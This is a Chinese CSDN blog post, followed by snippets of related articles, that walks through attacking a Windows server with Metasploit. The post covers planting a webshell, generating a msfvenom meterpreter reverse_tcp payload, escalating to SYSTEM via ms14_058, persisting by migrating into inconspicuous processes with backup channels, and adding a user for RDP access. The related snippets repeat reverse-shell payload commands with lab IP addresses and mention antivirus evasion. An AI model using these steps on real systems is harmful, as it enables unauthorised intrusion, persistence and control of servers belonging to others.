MSF进行windows提权

最新推荐文章于 2023-02-06 12:53:27 发布
最新推荐文章于 2023-02-06 12:53:27 发布
阅读量687 收藏 2
点赞数
分类专栏: 提权 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51822230/article/details/117265341
版权

主要思路

1.拿到webshell
2.上传大马
3.利用meterpreter模块生成payload
4.本地进行监听
5.进行提权
6.进行维权
7.生成新用户,连接3389

一、本地监听端口

①.生成payload
msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe

②.上传123.exe
这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可)

③.msf本地监听端口,并运行123.exe

在这里插入图片描述在这里插入图片描述拿到NETWORK SERVICE权限,这个是windows内置用户,大概权限跟user差不多。

在这里插入图片描述
④.进行权限提升
我们这里利用ms14_058进行提权,可以影响win server 2008 r2一下的版本

在这里插入图片描述
在这里插入图片描述提权到system用户
在这里插入图片描述

⑤.写入进程,进行维权。
在这里插入图片描述
注意点:
1.写入进程写在不重要的进程中
2.多准备几条通道进行备用

⑥.进入shell进行用户添加,进行内网资料收集

hsxiaowu
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用MSF进行windows、linux、wesng使用)
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
使用MSF进行windows、linux、wesng使用
最新发布
喜欢Python编程的程序员柚柚呀
02-29 1163
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
msf内网
dreamthe的博客
11-22 2311
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120 3.高程序运行级别。 4.基于ms16_016 5.基于ms14_058 ​6.基于ms13_053 7.uac绕过 8.基于ms16_032 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
内网渗透-升(使用MSF的一些方法)
Ping_Pig的博客
07-03 3215
讲在前面:方法有很多种和,这里供在利用MSF拿到低限用户后利用MSF的办法 直接输入限命令 meterpreter>getsystem 使用MSF内置bypassuac MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统限。 search bypassuac Matching Modules ================ # Name ...
kali下msf
失心少年
09-23 4733
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
记一次绕过火绒安全实战案例1
08-03
绕过火绒安全实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全狗等。为了获取服务器限,...
msf攻击Mysql服务.docx
04-26
3. **exploit/windows/mysql/mysql_mof**:这个模块利用Microsoft Object Definition Language (MOF)文件,可以触发远程代码执行,特别是在Windows MySQL服务器上进行。 4. **exploit/windows/mysql/...
Cobalt Strike
06-17
Cobalt Strike可以使用 AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,脚本等。 Cobalt Strike通信配置文件是 Malleable C2,你可以修改CS的通讯特征,Beacon payload的一些行为。 Cobalt ...
cs7.7--渗透测试神器,亲测可以使用,有问题私信
10-10
Cobalt Strike可以使用 AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,脚本等。 Cobalt Strike通信配置文件是 Malleable C2,你可以修改CS的通讯特征,Beacon payload的一些行为。 Cobalt ...
解决win10问题,一键,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
升总结
Christ1na的博客
03-07 6094
内网
118.网络安全渗透测试—[升篇16]—[Windows MSF模块&审计工具]
qwsn
07-08 4901
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)生成攻击载核:(2)msf开启监听: (3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低限的shell: (4)当前session下执行漏洞检测模块: #这里没有扫描到漏洞,可以换个方法扫描 当然了也可以指定session进行漏洞检测: (5)挂起session,在Metasploit控制台下search搜索2008 #根据关键字搜索,晒选结果中loc
【内网安全】——Windows姿势
Demo不是emo的博客
02-06 5231
超详细的windows姿势汇总
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1463
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 9211
MSF模拟渗透测试攻击linux实例
操作系统升(二)之常见的环境介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-29 997
因为拿到目标系统的shell不同,我们的的方式也不同,每种的姿势也就不同
利用msf实现windows的上线与
weixin_52049485的博客
01-07 1620
环境部署 攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe 开启监听 use exploit/mult
msf linux
09-17
进行kali对linux的渗透攻击时,可以利用MSF进行操作。有几种方法可以实现这个目标。 首先,可以利用MSF本身存在的后门漏洞进行攻击。这样可以获得对linux系统的访问限,并进一步。 其次,可以使用攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值